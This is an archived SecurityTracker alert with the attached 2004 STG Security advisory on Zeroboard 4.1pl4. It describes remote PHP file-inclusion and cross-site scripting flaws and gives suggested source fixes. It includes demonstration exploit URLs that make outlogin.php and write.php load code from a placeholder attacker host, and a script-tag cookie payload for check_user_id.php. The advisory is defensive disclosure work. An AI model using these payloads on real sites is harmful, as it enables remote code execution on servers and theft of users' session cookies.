SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Zeroboard Vendors:   NZEO
Zeroboard Input Validation Holes in out_login.php and write.php Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012677
SecurityTracker URL:  http://securitytracker.com/id/1012677
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 24 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 4.1pl4 and prior versions
Description:   STG Security reported several vulnerabilities in Zeroboard. A remote user can execute arbitrary commands on the target system. A remote user can also conduct cross-site scripting attacks.

It is reported that the 'outlogin.php' script does not properly validate user-supplied input in the '_zb_path' variable if PHP is configured with register_globals set on. A remote user can supply a specially crafted value for the variable to cause the target application to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL for PHP version 5 is provided:

http://[target]/outlogin.php?_zb_path=ftp://[attacker]/pub/

The 'dir' variable in 'write.php' is also affected. A demonstration exploit URL is provided:

http://[target]/include/write.php?dir=http://[attacker]/

It is also reported that 'check_user_id.php' does not filter HTML code from user-supplied input in the 'user_id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Zeroboard software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/check_user_id.php?user_id=<script>alert(document.cookie)</script>

The vendor was notified on November 20, 2004.

Jeremy Bae from STG Security is credited with discovering this flaw.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Zeroboard software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.zeroboard.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.


Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary commands execution.

Affected Products
================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - - Environment
PHP 5.0.x
php.ini : register_globals = On

- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.

- - - Part of vulnerable source, outlogin.php.
- - ----
// &#51228;&#47196;&#48372;&#46300; &#46356;&#47113;&#53664;&#47532; &#51064;&#51648; &#52404;&#53356;
if(!file_exists($_zb_path."lib.php")) {
  echo "&#51228;&#47196;&#48372;&#46300; &#46356;&#47113;&#53664;&#47532;&#44032; &#50500;&#45785;&#45768;&#45796;";
  return;
}

// _head.php &#51069;&#51020;
@include $_zb_path."_head.php";

}
- - ----

Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/


- - - Environment
php.ini: register_globals = On

- - - Reason
Uninitialized $dir variable in write.php


- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----

Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>


- - - Reason
check_user_id.php doesn't validate the input value of user_id.

- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... &#49373;&#47029; ...
if($check[0]) echo "$user_id &#45716; &#51060;&#48120; &#46321;&#47197;&#46108;<br> &#50500;&#51060;&#46356;&#51077;&#45768;&#45796;";
else echo"$user_id &#45716; &#49324;&#50857;&#54616;&#49892;&#49688; &#51080;&#49845;&#45768;&#45796;";
... &#49373;&#47029; ...
- - ----


Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";


Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";


Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));


Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC